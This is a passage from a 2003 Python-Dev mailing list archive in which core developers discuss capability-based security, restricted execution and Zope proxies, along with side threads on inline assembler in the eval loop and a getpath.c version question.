References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net> <3E69E1BC.5090508@algroup.co.uk> <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6A31EA.4090609@algroup.co.uk>

Guido van Rossum wrote:
>>What I am trying to nail down is exactly what needs doing to get us
>>from where we are now to where capabilities actually work. As I
>>understand it, what is needed is:
>>
>>a) Fix restricted execution, which is in a state of disrepair
> 
> 
> Yes.
> 
> 
>>b) Override import, open (and other stuff? what?)
> 
> 
> Don't worry about this; it's taken care of by the rexec module; each
> application will probably want to do this a little differently
> (certainly Zope has its own way).

I believe I heard way back that there was a lack of confidence rexec 
overrode everything that needed overriding - or am I getting mixed up 
with restricted execution?

>>c) Wrap or replace some of the existing libraries, certify that others 
>>are "safe"
> 
> 
> This should only be necessary for (core and 3rd party) extension
> modules.  The rexec module has a framework for this.
> 
> 
>>It looks to me like a and b are shared with proxies, and c would be 
>>different, by definition. Is there anything else? Am I on the wrong track?
> 
> 
> I don't know why you think (c) is different.

Because with proxies you'd wrap with proxies, and with capabilities 
you'd wrap with capabilities. Or do you think there's a way that would 
work for both (which would, of course, be great)?

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From jeremy@alum.mit.edu  Sat Mar  8 19:05:22 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 08 Mar 2003 14:05:22 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <3E69E1BC.5090508@algroup.co.uk>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
Message-ID: <1047150320.2347.26.camel@localhost.localdomain>

On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
> Bound methods are not capabilities unless they are secured. It seems the 
> correct way to do this is to use restricted execution, and perhaps some 
> other tricks. What I am trying to nail down is exactly what needs doing 
> to get us from where we are now to where capabilities actually work. As 
> I understand it, what is needed is:
> 
> a) Fix restricted execution, which is in a state of disrepair
> 
> b) Override import, open (and other stuff? what?)
> 
> c) Wrap or replace some of the existing libraries, certify that others 
> are "safe"
> 
> It looks to me like a and b are shared with proxies, and c would be 
> different, by definition. Is there anything else? Am I on the wrong track?

I have been trying to argue, though I feel a bit muddled at times, that
the proxy approach eliminates the need for rexec and makes it possible
to build a "restricted environment" without relying on the rexec code in
the interpreter.

Any security scheme needs some kind of information hiding to guarantee
that untrusted code does not break into the representation of an object,
so that, for example, an object can be used as a capability.  I think
we've discussed two different ways to implement information hiding.

The rexec approach is to add code to the interpreter to disable certain
introspection features when running untrusted code.

The proxy approach is to wrap protected objects in proxies before
passing them to untrusted code.

I think both techniques achieve the same end, but with different
limitations.  I prefer the proxy approach because it is more self
contained.  The rexec approach requires that all developers working in
the core on introspection features be aware of security issues.  The
security kernel ends up being most of the core interpreter -- anything
that can introspection on objects.  The proxy approach is to create an
object that specifically disables introspection by not exposing
internals to the core.  We need to do some more careful analysis to be
sure that proxies really achieve the goal of information hiding.

I think another benefit of proxies vs. rexec is that untrusted code can
still use all of the standard introspection features when dealing with
objects it creates itself.  Code running in rexec can't use any
introspective feature, period, because all those features are disabled. 
With the proxy approach, introspection is only disabled on protected
objects.

> I am going to write this all up into a document which can be used as a 
> starting point for work to complete this.

It sounds like a PEP would be the right thing.  It would be nice if the
PEP could explain the rationale for a secure Python environment and then
develop (at least) the capability approach to building that
environment.  Perhaps I could chip in with some explanation of the proxy
approach.

Jeremy


From guido@python.org  Sun Mar  9 00:25:13 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 08 Mar 2003 19:25:13 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sat, 08 Mar 2003 18:09:46 GMT."
 <3E6A31EA.4090609@algroup.co.uk>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
 <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>
 <3E6A31EA.4090609@algroup.co.uk>
Message-ID: <200303090025.h290PDY27718@pcp02138704pcs.reston01.va.comcast.net>

> >>b) Override import, open (and other stuff? what?)
> > 
> > Don't worry about this; it's taken care of by the rexec module; each
> > application will probably want to do this a little differently
> > (certainly Zope has its own way).
> 
> I believe I heard way back that there was a lack of confidence rexec 
> overrode everything that needed overriding - or am I getting mixed up 
> with restricted execution?

Indeed.

> >>c) Wrap or replace some of the existing libraries, certify that others 
> >>are "safe"
> > 
> > This should only be necessary for (core and 3rd party) extension
> > modules.  The rexec module has a framework for this.
> > 
> >>It looks to me like a and b are shared with proxies, and c would be 
> >>different, by definition. Is there anything else? Am I on the wrong track?
> > 
> > 
> > I don't know why you think (c) is different.
> 
> Because with proxies you'd wrap with proxies, and with capabilities 
> you'd wrap with capabilities. Or do you think there's a way that would 
> work for both (which would, of course, be great)?

OK, fair enough.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar  9 01:00:02 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 08 Mar 2003 20:00:02 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of 08 Mar 2003 14:05:22 EST."
 <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
 <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <200303090100.h29102I27782@pcp02138704pcs.reston01.va.comcast.net>

[Jeremy]
> I have been trying to argue, though I feel a bit muddled at times, that
> the proxy approach eliminates the need for rexec and makes it possible
> to build a "restricted environment" without relying on the rexec code in
> the interpreter.

There's one rexec-related feature that you'll need to use though: that
all built-ins (including __import__) are loaded from the __builtins__
variable in the globals, and that there's no way to get access to the
default __builtins__ (assuming the restricted builtins override
__import__ with something that won't let you import the real sys
module, etc.).  I mention this because this is actually a larger part
of the restricted execution code than the restrictions on certain
introspections that are also part of it.  The latter are clearly not
enough, and perhaps we should drop them (*requiring* proxies or
capabilities to implement the rexec module, rather than the old and
wounded Bastion [see Samuele's posts]).  But the former (the treatment
of __builtins__) is essential.

Perhaps mostly unrelated, I'll also note something about proxy
implementation.  Assuming proxies are instances of a type proxy, that
type must derive from a type object.  This means that if p is a proxy,
object.__getattribute__(p, 'foo') is valid.  It will take some very
careful analysis to prove that this cannot circumvent the proxy's
safeguards.  (I believe Zope's proxies are safe.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Sun Mar  9 03:41:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 08 Mar 2003 22:41:55 -0500
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <b4c9pk$4tu$1@main.gmane.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>

[Damien Morton]
> In the BINARY_ADD opcode, and in most arithmetic opcodes,

Aren't add and subtract the whole story here?

> there is a line that checks for overflow that looks like this:
>
> if ((i^a) < 0 && (i^b) < 0) goto slow_add;
>
> I got a small speedup by replacing this with a macro defined thusly:
>
> #if defined(_MSC_VER) and defined(_M_IX86)

"and" isn't C, so I assume you were very lucky <wink>.

> #define IF_OVERFLOW_GOTO(X) __asm { jo X };
> #else
> #define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
> #endif
>
> Would this case be an acceptable use of snippets of inline assembler?

If you had said "a huge speedup, on all programs", on the weak end of maybe.
"Small speedup" isn't worth the obscurity.  Note that Python contains no
assembler now.


From tismer@tismer.com  Sun Mar  9 04:16:24 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sun, 09 Mar 2003 05:16:24 +0100
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>
Message-ID: <3E6AC018.90007@tismer.com>

Tim Peters wrote:
> [Damien Morton]
> 
>>In the BINARY_ADD opcode, and in most arithmetic opcodes,
> 
> 
> Aren't add and subtract the whole story here?
> 
> 
>>there is a line that checks for overflow that looks like this:
>>
>>if ((i^a) < 0 && (i^b) < 0) goto slow_add;
>>
>>I got a small speedup by replacing this with a macro defined thusly:
>>
>>#if defined(_MSC_VER) and defined(_M_IX86)
> 
> 
> "and" isn't C, so I assume you were very lucky <wink>.
> 
> 
>>#define IF_OVERFLOW_GOTO(X) __asm { jo X };
>>#else
>>#define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
>>#endif
>>
>>Would this case be an acceptable use of snippets of inline assembler?
> 
> 
> If you had said "a huge speedup, on all programs", on the weak end of maybe.
> "Small speedup" isn't worth the obscurity.  Note that Python contains no
> assembler now.

Just to add my 0.02 EUR.

You know that I'm not reluctant to use assembly for
platform specific speedups.
But first, I'm with Tim, not going this path for such
a small win.
Second, I'd like to point out that going to assembly
for such a huge function like eval_frame is rather
dangerous: All compilers have different ways of
handling the appearance of assembly. This is a dangerous
path, believe me:

MS C's behavior is one of the worst, which is the
reason why I was very careful to put this in a clean-room
for Stackless, for instance:
For the appearance of ASM code in some function, the
calling sequence and the optimization strategy are
changed drastically. Register allocation is changed,
the optimization level is reduced, and the calling
convention is *never* without stack frames.
This might not have changed eval_frame's behavior
too much, just because it is too big to benefit
from certain optimizations now, but I remember that
I changed it once to use about two registers less,
and I might re-apply these changes to give the eval loop
a boost of about 10 percent.
The existance of a single one asm statement would
voiden this effect!

Hint: Write a small, understandable function twice,
once using assembly and once without. Compile the
stuff, and set the listing option to everything.
Then look at the .cod file, and wonder how different
the two versions are.
This will make you very reluctant to use any asm statement
at all, unless you want to re-write the whole function
in assembly, including the "naked" option.

Doing the latter for eval_frame would be worthwhile,
but then I'd suggest to do this as an external .asm
file. If you do this right, taking cache lines and
probabilities into account, you can for sure create
an overall gain of up to 20 percent.

But even this remarkable gain wouldn't be enough,
even for me, to go this hard path for a single platform.

sincerely -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From dmorton@bitfurnace.com  Sun Mar  9 05:00:09 2003
From: dmorton@bitfurnace.com (damien morton)
Date: Sun, 9 Mar 2003 00:00:09 -0500
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>
Message-ID: <000501c2e5f8$c384b6e0$6401a8c0@damien>

> -----Original Message-----
> From: Tim Peters [mailto:tim.one@comcast.net] 
> Sent: Saturday, 8 March 2003 22:42
> To: Damien Morton
> Cc: python-dev@python.org
> Subject: RE: [Python-Dev] acceptability of asm in python code?
> 
> 
> [Damien Morton]
> > In the BINARY_ADD opcode, and in most arithmetic opcodes,
> 
> Aren't add and subtract the whole story here?

ADD, SUBTRACT and INPLACE variants, yes. Potentially also MULTIPLY.
 
> > there is a line that checks for overflow that looks like this:
> >
> > if ((i^a) < 0 && (i^b) < 0) goto slow_add;
> >
> > I got a small speedup by replacing this with a macro defined thusly:
> >
> > #if defined(_MSC_VER) and defined(_M_IX86)
> 
> "and" isn't C, so I assume you were very lucky <wink>.

I had been using _MSC_VER, but decided to be a bit more specific for my
post. Youre right, of course, the define I posted would not have worked.

> > #define IF_OVERFLOW_GOTO(X) __asm { jo X };
> > #else
> > #define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) 
> goto X; #endif
> >
> > Would this case be an acceptable use of snippets of inline 
> assembler?
> 
> If you had said "a huge speedup, on all programs", on the 
> weak end of maybe. "Small speedup" isn't worth the obscurity. 
>  Note that Python contains no assembler now.

Its arguable which is more obscure, the x86 assembly instruction "jo"
(jump if overflow), or the xor trickery in C. <wink>

I take your point, though, about there being no assembly in python now.


From cjohns@cybertec.com.au  Sun Mar  9 05:17:23 2003
From: cjohns@cybertec.com.au (Chris Johns)
Date: Sun, 09 Mar 2003 16:17:23 +1100
Subject: [Python-Dev] VERSION in getpath.c
Message-ID: <3E6ACE63.8080903@cybertec.com.au>

Hello,

First, I am new to Python so I hope this is the correct place to post this type 
of question.

I am playing with embedding Python 2.3a and I am tring to get importing to work. 
I have noticed the following in module_search_path :

  /tftpboot/lib/python21.zip
  /python/lib/python2.1/lib-dynload

The 2.1 comes from the VERSION label at the start of getpath.c. Should this be 
PACKAGE_VERSION ?


Regards

-- 
  Chris Johns, cjohns at cybertec.com.au


From eppstein@ics.uci.edu  Sun Mar  9 05:33:06 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sat, 08 Mar 2003 21:33:06 -0800
Subject: [Python-Dev] Re: acceptability of asm in python code?
References: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net> <000501c2e5f8$c384b6e0$6401a8c0@damien>
Message-ID: <eppstein-A5A416.21330608032003@main.gmane.org>

In article <000501c2e5f8$c384b6e0$6401a8c0@damien>,
 "damien morton" <dmorton@bitfurnace.com> wrote:

> > If you had said "a huge speedup, on all programs", on the 
> > weak end of maybe. "Small speedup" isn't worth the obscurity. 
> >  Note that Python contains no assembler now.
> 
> Its arguable which is more obscure, the x86 assembly instruction "jo"
> (jump if overflow), or the xor trickery in C. <wink>
> 
> I take your point, though, about there being no assembly in python now.

The place to put this sort of low-level instruction optimization is in 
the peepholer of your C compiler.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science


From jim@zope.com  Sun Mar  9 11:01:18 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 09 Mar 2003 06:01:18 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6B1EFE.4060500@zope.com>

Guido van Rossum wrote:
> [Moving a discussion about capabilities to where it arguably belongs]

Thanks Guido. I'll respond to Ben here.

> [Ben Laurie]
> 
>>The point about capabilities is that mere possession of a capability is 
>>all that is required to exercise it. If you start adding security 
>>checkers to them, then you don't have capabilities anymore.

Right. Jeremy keeps remining me of this point. Zope 3 uses proxies
in a way that doesn't conform to this definition. Zope proxies
proxy an object to be protected *and* a policy object called a "checker".
The checkers used in Zope perform checks at access time.  One could,
instead, perform the checks when the proxies are created or earlier
and use checkers that simply allowed some names or operations and not
others. IOW, you could certainly implement a strict capability model
with Zope proxies.

...

>>BTW, if you would like to explain why you don't think bound methods are 
>>the way to go on python-dev, I'd love to hear it.

I'll give an answer similar to Guido's but with a different emphasis.

I'm an object zealot. :) I like working with object oriented systems.  I don't
want to lose that and, thus, I don't want computation to be reduced to passing
around basic values and functions.  I want to be able to pass around objects
with interfaces.  Zope proxies make it easy to define a capability
in terms of an interface. I think this is really important for
object-oriented systems.

Another feature of Zope proxies that I think is important is that they
automate creation of proxies. When you get an attribute from a proxy,
the value is proxied. (Actually, the checker decides whether the value
is proxied. Zope checkers proxy all objects except basic objects such
as numbers, strings, and None.) When you perform an operation on a proxied
object, the result is proxied.  This means that the code being proxied doesn't
have to be aware of proxies, capabilities, or a security model.

Note that when you access a method on a proxied object, the method itself is
proxied. All you can to with a proxied method is call it, get it's name, and
convert it to a string. This is true even of the proxied method is passed to
unrestricted code.

I agree that we all need restricted execution to work better than it does
now.  I was hoping that we could colaborate at a higher level as well.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Sun Mar  9 11:13:59 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 09 Mar 2003 06:13:59 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <3E6B21F7.3040300@zope.com>

Jeremy Hylton wrote:
> On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
> 
>>Bound methods are not capabilities unless they are secured. It seems the 
>>correct way to do this is to use restricted execution, and perhaps some 
>>other tricks. What I am trying to nail down is exactly what needs doing 
>>to get us from where we are now to where capabilities actually work. As 
>>I understand it, what is needed is:
>>
>>a) Fix restricted execution, which is in a state of disrepair
>>
>>b) Override import, open (and other stuff? what?)
>>
>>c) Wrap or replace some of the existing libraries, certify that others 
>>are "safe"
>>
>>It looks to me like a and b are shared with proxies, and c would be 
>>different, by definition. Is there anything else? Am I on the wrong track?
> 
> 
> I have been trying to argue, though I feel a bit muddled at times, that
> the proxy approach eliminates the need for rexec and makes it possible
> to build a "restricted environment" without relying on the rexec code in
> the interpreter.
> 
> Any security scheme needs some kind of information hiding to guarantee
> that untrusted code does not break into the representation of an object,
> so that, for example, an object can be used as a capability.  I think
> we've discussed two different ways to implement information hiding.
> 
> The rexec approach is to add code to the interpreter to disable certain
> introspection features when running untrusted code.
> 
> The proxy approach is to wrap protected objects in proxies before
> passing them to untrusted code.
> 
> I think both techniques achieve the same end, but with different
> limitations.  I prefer the proxy approach because it is more self
> contained.  The rexec approach requires that all developers working in
> the core on introspection features be aware of security issues.  The
> security kernel ends up being most of the core interpreter -- anything
> that can introspection on objects.  The proxy approach is to create an
> object that specifically disables introspection by not exposing
> internals to the core.  We need to do some more careful analysis to be
> sure that proxies really achieve the goal of information hiding.
> 
> I think another benefit of proxies vs. rexec is that untrusted code can
> still use all of the standard introspection features when dealing with
> objects it creates itself.  Code running in rexec can't use any
> introspective feature, period, because all those features are disabled. 
> With the proxy approach, introspection is only disabled on protected
> objects.

These are all good points.

Proxies have a dark side though.  They sometimes trip up standard facilities
in Python that either depend on specific types or on identity comparisons.
With a bit of effort, proxies can be made highly transparent, but they change
an object's type and id.  For example, you can't proxy exceptions without
breaking exception handling. In Zope, we rely on restricted execution to prevent
certian kinds of introspection on exceptions and exception classes.  In Zope, we
also don't proxy None, because None is usually checked for identity. We also don't
proxy strings, and numbers.

I think I agree that you could build a restricted environment with proxies alone, but,
to do so, you would need to make Python far more proxy aware.  I think that the
language would need to be aware of proxies at a far deeper level.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Sun Mar  9 11:29:15 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 09 Mar 2003 06:29:15 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <3E68AAF4.3060508@algroup.co.uk>
References: <15930.48758.62473.425111@slothrop.zope.com>	 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>	 <15933.30607.900530.370402@localhost.localdomain>	 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk>
Message-ID: <3E6B258B.2080207@zope.com>

Ben Laurie wrote:
> Jeremy Hylton wrote:
> 
...

> And in either case, you also need to restrict access to the underlying 
> libraries and (presumably) some of the builtin functions?

You don't need restricted execution to make proxies work.  In Zope,
we choose to use restricted execution in cases where proxies don't
work well. (For example, as I mentioned in another note, we can't
currently proxy exceptions.)

> BTW, Guido pointed out to me that I'm causing confusion by saying 
> "rexec" when I really mean "restricted execution".

Right. I think that there is some confusion floating around wrt proxies
(not your fault :) ...

> In short, it seems to me that proxies and capabilities via bound methods 
> both do the same basic thing: i.e. prevent inspection of what is behind 
> the capability/proxy. Proxies add access control to decide whether you 
> get to use them or not, whereas in a capability system simple posession 
> of the capability is sufficient (i.e. they are like a proxy where the 
> security check always says "yes"). You do access control using 
> capabilities, instead of inside them.
> 
> Am I not understanding proxies?

You are understanding proxies as they are *applied* in Zope.
This is understandable, since the information I sent you:

   http://cvs.zope.org/Zope3/src/zope/security/readme.txt?rev=HEAD&content-type=text/vnd.viewcvs-markup

talks more about the higher-level application of proxies in Zope than
about the basic proxy features.

Really, Zope proxies are on about the same level as bound methods.
They are a lower-level abstraction than capabilities.  YOu could
use them to implement capabilities or you could use them to implement
a different approach, as we have done in Zope.

As I mentioned in another Zope, I think proxies provide a better way
to implement capabilities than bound methods because they provide access
to objects with whole interfaces, rather than just individual functions or
methods.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From pedronis@bluewin.ch  Sun Mar  9 11:30:09 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 9 Mar 2003 12:30:09 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com>
Message-ID: <011f01c2e62f$3e6d5840$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
> For example, you can't proxy exceptions without
> breaking exception handling. In Zope, we rely on restricted execution to
prevent
> certian kinds of introspection on exceptions and exception classes.  In Zope,
we
> also don't proxy None, because None is usually checked for identity. We also
don't
> proxy strings, and numbers.
>
That was a question I was asking myself about proxies: exception handling.
But I never had the time to play with it to check.

Does that mean that restricted code can get unproxied instances of classic
classes as caught exceptions?


From guido@python.org  Sun Mar  9 11:40:27 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 06:40:27 -0500
Subject: [Python-Dev] VERSION in getpath.c
In-Reply-To: "Your message of Sun, 09 Mar 2003 16:17:23 +1100."
 <3E6ACE63.8080903@cybertec.com.au>
References: <3E6ACE63.8080903@cybertec.com.au>
Message-ID: <200303091140.h29BeRO04633@pcp02138704pcs.reston01.va.comcast.net>

> First, I am new to Python so I hope this is the correct place to
> post this type of question.

It's not, but you're forgiven.

> I am playing with embedding Python 2.3a and I am tring to get
> importing to work. I have noticed the following in
> module_search_path :
> 
>   /tftpboot/lib/python21.zip
>   /python/lib/python2.1/lib-dynload
> 
> The 2.1 comes from the VERSION label at the start of
> getpath.c. Should this be PACKAGE_VERSION ?

No, if you look in the Makefile the VERSION variable is passed in from
the Makefile to the compilation of getpath.c (only), so that you can
override it (and a few other parameters) from the Makefile command
line.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar  9 12:03:18 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 07:03:18 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: "Your message of Sun, 09 Mar 2003 06:29:15 EST."
 <3E6B258B.2080207@zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com>
 <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com>
Message-ID: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>

[Jim]
> You don't need restricted execution to make proxies work.

Um, I think that's a dangerous mistake, or a confusion in terminology.

Without restricted execution, untrusted code would have access to
sys.modules, and from there it would be able to access
removeAllProxies.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar  9 12:06:31 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 07:06:31 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: "Your message of Sun, 09 Mar 2003 06:29:15 EST."
 <3E6B258B.2080207@zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com>
 <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com>
Message-ID: <200303091206.h29C6VI04752@pcp02138704pcs.reston01.va.comcast.net>

> Really, Zope proxies are on about the same level as bound methods.

Another difference is that proxies were *designed* for securing off
all access.  Bound methods have introspection facilities which allow
you to go around them.  Restricted execution tries to fence off those
introspection facilities, but there may be a hole in the fence.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From zooko@zooko.com  Sun Mar  9 12:40:23 2003
From: zooko@zooko.com (Zooko)
Date: Sun, 09 Mar 2003 07:40:23 -0500
Subject: [Python-Dev] Re: Capabilities
Message-ID: <E18s06J-0006ZD-00@localhost>

To enforce capability access control, a language requires three things:

1.  Pointer-safety.  (There must not be a function available which performs the 
inverse of id().)  Python has pointer-safety (unless a 3rd party native 
extension module has been executed).

2.  Mandatory private data (accessible only by the object itself).  Normal 
Python doesn't have mandatory private data.  If I understand correctly, both 
rexec and proxies (attempt to) provide this.  They also attempt to provide 
another safety feature: a wrapper around the standard library and builtins that 
turns off access to dangerous features according to an overridable security 
policy.

3.  A standard library that follows the Principle of Least Privilege.  That is, 
a library full of tools that you can extend to an object in order to empower it 
to do specific things (e.g. __builtin__.abs(), os.times(), ...) without thereby 
also empowering it to do other things (e.g. __builtin__.file(), os.system(), 
...).  Python doesn't have such a library.

Now the Principle of Least Privilege approach to making a library safe is very 
different from the "sandbox" approach.  The latter is to remove all "dangerous" 
tools from the toolbox (or in our case, to have them dynamically disabled by the 
"restricted" bit which is determined by an overridable policy).  The former is 
to separate the tools so that dangerous ones don't come tied together with 
common ones.  The security policy, then, is expressed by code that grants or 
withholds capabilities (== references) rather than by code that toggles the 
"restricted" bit.

Of course, you can start by denying the entire standard library to restricted 
code, and then incrementally refactor the library or wrap it in Least-Privilege 
wrappers.

Until you have a substantial Least-Privilege-respecting library you can't gain 
the big benefit of capabilities -- code which is capable of doing something 
useful without also being capable of doing harm.  (You can gain the "sandbox" 
style of security -- code which is incapable of doing anything useful or 
harmful.)

This requirement also means that there can be no "ambient authority" -- 
authority that an object receives even if its creator has given it no 
references.

Regards,

Zooko

P.S.  I learned this three-part paradigm from Mark Miller whose paper with Chip 
Morningstar and Bill Frantz articulates it in more detail:

http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop


From zooko@zooko.com  Sun Mar  9 12:48:31 2003
From: zooko@zooko.com (Zooko)
Date: Sun, 09 Mar 2003 07:48:31 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Zooko <zooko@zooko.com>
 of "Sun, 09 Mar 2003 07:40:23 EST."
Message-ID: <E18s0EB-0006la-00@localhost>

Following-up to my own post in order to apologize for contributing to the 
tradition of confusing restricted execution with rexec.

 I, Zooko, wrote:
>
> 2.  Mandatory private data (accessible only by the object itself).  Normal 
> Python doesn't have mandatory private data.  If I understand correctly, both 
> rexec and proxies (attempt to) provide this.  They also attempt to provide 
> another safety feature: a wrapper around the standard library and builtins that 
> turns off access to dangerous features according to an overridable security 
> policy.

Perhaps it is that "restricted execution" is designed to provide private data, 
by disabling certain introspection features, and "rexec" and "proxies" are 
designed to provide the wrapper feature?

Regards,

Zooko


From ben@algroup.co.uk  Sun Mar  9 12:45:39 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Sun, 09 Mar 2003 12:45:39 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <3E6B3773.7070600@algroup.co.uk>

Jeremy Hylton wrote:
> On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
> 
>>Bound methods are not capabilities unless they are secured. It seems the 
>>correct way to do this is to use restricted execution, and perhaps some 
>>other tricks. What I am trying to nail down is exactly what needs doing 
>>to get us from where we are now to where capabilities actually work. As 
>>I understand it, what is needed is:
>>
>>a) Fix restricted execution, which is in a state of disrepair
>>
>>b) Override import, open (and other stuff? what?)
>>
>>c) Wrap or replace some of the existing libraries, certify that others 
>>are "safe"
>>
>>It looks to me like a and b are shared with proxies, and c would be 
>>different, by definition. Is there anything else? Am I on the wrong track?
> 
> 
> I have been trying to argue, though I feel a bit muddled at times, that
> the proxy approach eliminates the need for rexec and makes it possible
> to build a "restricted environment" without relying on the rexec code in
> the interpreter.

Wouldn't that suggest that the way to fix restricted execution is to do 
something proxylike, then?

> Any security scheme needs some kind of information hiding to guarantee
> that untrusted code does not break into the representation of an object,
> so that, for example, an object can be used as a capability.  I think
> we've discussed two different ways to implement information hiding.

Yes.

> The rexec approach is to add code to the interpreter to disable certain
> introspection features when running untrusted code.
> 
> The proxy approach is to wrap protected objects in proxies before
> passing them to untrusted code.

Again, this suggests to me that perhaps restricted execution should also 
use wrapping. I guess I will study this idea in more detail when I start 
writing.

> I think both techniques achieve the same end, but with different
> limitations.  I prefer the proxy approach because it is more self
> contained.  The rexec approach requires that all developers working in
> the core on introspection features be aware of security issues.  The
> security kernel ends up being most of the core interpreter -- anything
> that can introspection on objects.  The proxy approach is to create an
> object that specifically disables introspection by not exposing
> internals to the core.  We need to do some more careful analysis to be
